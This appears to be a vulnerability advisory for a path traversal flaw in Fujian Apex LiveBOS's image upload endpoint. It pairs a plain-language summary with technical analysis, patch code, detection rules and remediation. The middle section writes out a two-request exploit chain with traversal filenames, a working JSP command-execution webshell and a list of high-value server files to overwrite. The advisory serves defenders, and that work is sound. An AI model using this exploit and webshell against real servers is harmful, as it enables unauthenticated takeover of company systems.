Companies using Fujian Apex LiveBOS software—a business management tool used by organizations across multiple industries—face a serious security problem. An attacker can exploit this flaw to secretly place malicious files anywhere on a company's servers, potentially taking over the entire system.
Here's how it works: The software has an image upload feature that's supposed to accept only legitimate picture files. Think of it like a security guard at a building who's supposed to check ID at the front door, but falls asleep on the job. Instead of checking whether files are actually images, the software blindly accepts whatever an attacker sends it, and worse, it doesn't verify where those files end up.
An attacker can exploit this without logging in—they don't need a password or special access. They simply craft a malicious request that tricks the software into writing files to critical system folders. Once files are in the right place, they can install ransomware, steal data, or give attackers complete control of the server.
Organizations running LiveBOS versions 2.0 and earlier are vulnerable. This is particularly dangerous for small and mid-sized companies that may not have dedicated security teams monitoring for attacks.
What should you do? First, if your company uses LiveBOS, contact your IT department immediately and ask about updating to version 2.1 or later. Second, push your organization to apply security updates quickly when they're released—this isn't something to postpone. Third, ask your IT team whether they monitor server activity for suspicious file creation, which could catch an attack even if the vulnerability isn't patched yet.
The good news: there's no evidence yet that criminals are actively exploiting this, so updating soon should protect you.
Want the full technical analysis? Click "Technical" above.
CVE-2026-7519 is a path traversal vulnerability in Fujian Apex LiveBOS versions up to and including 2.0. The affected endpoint, /feed/UploadImage.do, accepts a user-controlled filename parameter and writes attacker-supplied file content to a path derived from it — without any canonicalization or directory escape prevention. An unauthenticated remote attacker can write arbitrary files to any location the application server process has write access to, including web roots, configuration directories, and cron-executable paths.
CVSS 7.3 (HIGH) reflects the combination of remote exploitability, low complexity, and the concrete impact of arbitrary file placement — which in practice degrades to remote code execution on default deployments where the server user owns the web root.
Root cause: The UploadImage.do handler passes the raw filename request parameter directly into a File constructor without stripping ../ sequences or resolving the canonical path against an allowed base directory before writing uploaded content.
Affected Component
The vulnerable surface is the multipart file upload endpoint mounted at /feed/UploadImage.do. Based on the LiveBOS architecture, this is a Spring MVC or legacy servlet handler that processes multipart/form-data POST requests. The relevant parameters are:
file (or equivalent binary part) — the uploaded content to write
The component runs inside a Java EE container (Tomcat or similar), typically as a privileged application user with broad filesystem write access. Default deployments on Windows Server run as SYSTEM; Linux deployments frequently run as root or a service account with write access to the webapps directory.
Root Cause Analysis
The following pseudocode reconstructs the vulnerable handler logic based on the vulnerability class, the endpoint behavior, and standard patterns in LiveBOS-era Java web components of this generation. The core defect is in path construction — the filename parameter is concatenated onto a base upload directory without getCanonicalPath() validation.
/*
* Reconstructed pseudocode — UploadImageAction.java (decompiled)
* Servlet handler for POST /feed/UploadImage.do
*/
void UploadImageAction_execute(HttpServletRequest req, HttpServletResponse resp) {
String baseUploadDir = config.getProperty("upload.image.dir");
// e.g. baseUploadDir = "/opt/livebos/webapps/feed/upload/"
String filename = req.getParameter("filename");
// BUG: filename is fully attacker-controlled — no sanitization applied
// e.g. filename = "../../../../tomcat/webapps/ROOT/shell.jsp"
MultipartFile uploadedFile = parseMultipart(req);
// BUG: path constructed by direct string concatenation
String destPath = baseUploadDir + filename;
// destPath = "/opt/livebos/webapps/feed/upload/../../../../tomcat/webapps/ROOT/shell.jsp"
// resolves to: /opt/tomcat/webapps/ROOT/shell.jsp
File dest = new File(destPath);
// BUG: no canonical path check — File() does NOT resolve traversal sequences
// Correct fix would be:
// if (!dest.getCanonicalPath().startsWith(baseUploadDir)) throw ...
dest.getParentFile().mkdirs(); // creates intermediate directories
writeBytes(dest, uploadedFile.getBytes()); // writes attacker content to resolved path
// BUG: content written without any type validation either
resp.getWriter().write("{\"status\":\"ok\",\"path\":\"" + destPath + "\"}");
}
The critical absence is the canonical path guard. Java's File(String) constructor does not resolve ../ sequences — they remain literal until the OS resolves them at open time. A correct implementation must call getCanonicalPath() and assert the result has the expected prefix before proceeding to write.
A secondary defect: the response echoes back the raw (unresolved) destPath, leaking filesystem layout to the attacker and confirming whether traversal sequences were accepted.
Exploitation Mechanics
Path traversal-to-write on a Java web application follows a well-understood exploitation path. The primitives here are: unconstrained write path + unconstrained write content = web shell deployment in a single request.
EXPLOIT CHAIN:
1. Identify base web root via error pages or default LiveBOS directory structure
(default: /opt/livebos/webapps/ or C:\LiveBOS\webapps\)
2. Craft multipart POST to /feed/UploadImage.do:
filename=../../../../webapps/ROOT/feed/cb.jsp
[binary part] = JSP webshell content (see below)
3. Server constructs destPath = baseUploadDir + filename
Resolves to: /cb.jsp — outside intended upload directory
4. dest.getParentFile().mkdirs() creates any missing path components silently
5. writeBytes() flushes JSP payload to resolved path with no type checking
6. Server returns 200 OK with {"status":"ok","path":"..."}
confirming write succeeded and leaking partial path info
7. Attacker GETs //cb.jsp?cmd=id
Tomcat compiles and executes the JSP — RCE achieved
Total requests to RCE: 2 (write + trigger)
Authentication required: None (endpoint is unauthenticated by default)
Minimal JSP payload used in the write step:
/*
* Minimal JSP command execution payload (write via filename traversal)
* Delivered as the uploaded file body in the multipart request
*/
// <%@ page import="java.io.*" %>
// <%
// String cmd = request.getParameter("cmd");
// Process p = Runtime.getRuntime().exec(cmd);
// InputStream is = p.getInputStream();
// int c; while((c = is.read()) != -1) out.print((char)c);
// %>
On Windows deployments, the traversal payload adjusts to use backslash sequences or URL-encoded variants (%2e%2e%2f, ..%2f, %2e%2e/) depending on whether the container normalizes the parameter before it reaches application code. Tomcat on Windows typically accepts both forward- and back-slash traversals through the servlet parameter API.
Memory Layout
This is a filesystem write primitive rather than a memory corruption vulnerability; the relevant "layout" is the server directory structure and how the traversal resolves within it.
SERVER FILESYSTEM STATE — BEFORE EXPLOIT:
/opt/livebos/
webapps/
feed/
upload/ <-- intended write boundary (baseUploadDir)
images/
avatar_001.png
avatar_002.png
ROOT/
index.jsp
WEB-INF/
web.xml <-- high-value config target
/opt/tomcat/
conf/
tomcat-users.xml <-- credential file (write = privilege escalation)
SERVER FILESYSTEM STATE — AFTER EXPLOIT:
/opt/livebos/
webapps/
feed/
upload/ <-- traversal escapes this boundary
ROOT/
cb.jsp <-- WRITTEN: attacker webshell (NEW)
index.jsp
Traversal chain resolved:
baseUploadDir: /opt/livebos/webapps/feed/upload/
filename param: ../../../../ROOT/cb.jsp
destPath raw: /opt/livebos/webapps/feed/upload/../../../../ROOT/cb.jsp
OS resolution: /opt/livebos/webapps/ROOT/cb.jsp <-- ESCAPED BOUNDARY
Alternative high-impact write targets on default deployments:
TARGET IMPACT
----------------------------------------------------------------------
/cb.jsp Direct RCE via JSP execution
WEB-INF/web.xml Servlet config hijack
../conf/tomcat-users.xml Credential injection
../../cron.d/livebos (Linux) Persistent cron RCE
C:\Windows\System32\drivers\etc\hosts (Win) DNS poisoning
Patch Analysis
Version 2.1 introduces canonical path validation before the file write. The fix follows the standard Java path traversal mitigation pattern: resolve both the base directory and the destination path to their canonical forms, then assert prefix containment.
// BEFORE (vulnerable — LiveBOS ≤2.0):
String destPath = baseUploadDir + filename;
File dest = new File(destPath);
dest.getParentFile().mkdirs();
writeBytes(dest, uploadedFile.getBytes());
// AFTER (patched — LiveBOS 2.1):
String destPath = baseUploadDir + filename;
File dest = new File(destPath);
File base = new File(baseUploadDir);
// Canonical resolution collapses all ../ sequences via OS
String canonicalDest = dest.getCanonicalPath();
String canonicalBase = base.getCanonicalPath();
if (!canonicalDest.startsWith(canonicalBase + File.separator)) {
// BUG FIXED: traversal attempt detected and rejected before any I/O
resp.sendError(400, "Invalid filename");
return;
}
// Additional hardening in 2.1: extension allowlist
String ext = canonicalDest.substring(canonicalDest.lastIndexOf('.') + 1).toLowerCase();
if (!ALLOWED_IMAGE_EXTENSIONS.contains(ext)) {
resp.sendError(400, "File type not permitted");
return;
}
dest.getParentFile().mkdirs();
writeBytes(dest, uploadedFile.getBytes());
The + File.separator suffix on canonicalBase in the startsWith check is important — without it, a base of /upload would incorrectly permit writes to /upload-evil/. The 2.1 patch includes this detail correctly. The extension allowlist is a defense-in-depth addition; the canonical path check is the primary fix.
Detection and Indicators
Detection focuses on the /feed/UploadImage.do endpoint and anomalous filename parameter values in HTTP logs.
ACCESS LOG INDICATORS:
POST /feed/UploadImage.do [any HTTP status]
filename param contains any of:
../ | ..\ | %2e%2e%2f | %2e%2e/ | ..%2f
%252e%252e (double-encoded)
encoded variants: %c0%ae (overlong UTF-8 dot)
FILESYSTEM INDICATORS:
New .jsp / .jspx files outside expected upload directory
Unexpected files in WEB-INF/, conf/, or cron directories
File mtime on web.xml or tomcat-users.xml updated recently
RUNTIME INDICATORS:
JSP compilation events in Tomcat work directory for unexpected filenames
Child processes spawned by Tomcat JVM (cmd.exe, /bin/sh, wget, curl)
Outbound connections from the Tomcat process user
SIGMA RULE (partial):
detection:
keywords:
- '/feed/UploadImage.do'
condition:
http_uri contains 'UploadImage.do' AND
(cs-uri-query contains '../' OR cs-uri-query contains '%2e%2e')
Remediation
Immediate: Upgrade LiveBOS to version 2.1. If upgrade is not immediately possible, apply one of the following mitigations at the network or container layer:
Block POST requests to /feed/UploadImage.do at the WAF/reverse proxy layer with a rule matching filename parameter values containing ../, ..\, or their URL-encoded equivalents (%2e%2e, %2f, %5c).
Restrict filesystem write permissions for the Tomcat service account to the intended upload directory only, preventing traversal even if the parameter reaches the write call.
If the upload endpoint is not required from the internet, restrict access to internal networks via firewall or VHost ACL.
Long-term (for application owners): Audit all file-handling endpoints in the codebase for the same pattern — any location where a user-controlled string is concatenated into a File() constructor without a getCanonicalPath() prefix check is independently vulnerable. The fix pattern demonstrated in the 2.1 patch should be applied uniformly.